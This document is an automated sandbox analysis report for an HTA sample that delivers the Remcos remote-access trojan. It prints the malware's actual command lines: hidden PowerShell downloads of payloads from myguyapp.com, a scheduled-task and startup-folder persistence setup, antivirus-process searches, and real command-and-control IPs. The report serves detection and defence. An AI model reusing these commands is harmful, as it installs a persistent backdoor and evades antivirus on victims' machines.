Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:	c2.hta
Analysis ID:	1585618
MD5:	cbcdda2a4fece3b9fe71dc53b039762d
SHA1:	61113f8d33d3331152a4e627b0720c0ab261fae8
SHA256:	30ce460b7556cd59def93926bcd3b3e3e2ff24a66f368c9deed7efe7117d0105
Tags:	htauser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Sigma detected: Drops script at startup location

Sigma detected: Remcos

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

AI detected suspicious sample

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Legitimate Application Dropped Script

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7308 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 7468 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7512 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Acrobat.exe (PID: 7680 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7980 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 8136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1720,i,5858866170035192879,1714130894212185246,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

powershell.exe (PID: 7696 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 8344 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msword.exe (PID: 8668 cmdline: msword.exe MD5: 90B82696A0A9DE2974B4BD90C61EC6ED)

cmd.exe (PID: 8832 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8960 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 8968 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 9020 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9028 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9084 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 9096 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 9120 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9136 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 9152 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Propose.com (PID: 9168 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 9200 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5956 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 1196 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 9184 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cmd.exe (PID: 8712 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 8788 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

wscript.exe (PID: 7832 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

LinkHub.com (PID: 7700 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 8584 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

LinkHub.com (PID: 8616 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7308, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 9200, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 5956, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7696, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7308, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 7468, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7696, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7832, ProcessName: wscript.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7512, ProcessName: powershell.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7512, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7832, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7468, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7512, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1196, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8832, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 9028, ProcessName: findstr.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 9168, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T22:33:50.109027+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49753	193.26.115.39	7009	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T22:33:51.238507+0100	2803304	3	Unknown Traffic	192.168.2.4	49754	178.237.33.50	80	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T22:33:00.545381+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49734	193.26.115.39	443	TCP
2025-01-07T22:33:04.583951+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49736	193.26.115.39	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected Remcos RAT

Source: Yara match

File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_004062D5 FindFirstFileW,FindClose,	12_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_00402E18 FindFirstFileW,	12_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	12_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B7A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00B7A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B7A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00B7A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00B6E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B7A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00B7A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B766DC FindFirstFileW,FindNextFileW,FindClose,	38_2_00B766DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B3C622 FindFirstFileExW,	38_2_00B3C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_00B773D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B77333 FindFirstFileW,FindClose,	38_2_00B77333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00B6D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00B6DC54

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49753 -> 193.26.115.39:7009

Source: global traffic

TCP traffic: 192.168.2.4:49753 -> 193.26.115.39:7009

Source: global traffic

TCP traffic: 192.168.2.4:56889 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 193.26.115.39 193.26.115.39

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49754 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 193.26.115.39:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49736 -> 193.26.115.39:443

Source: global traffic	HTTP traffic detected: GET /c2.bat HTTP/1.1Accept: /Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: candwfarmsllc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
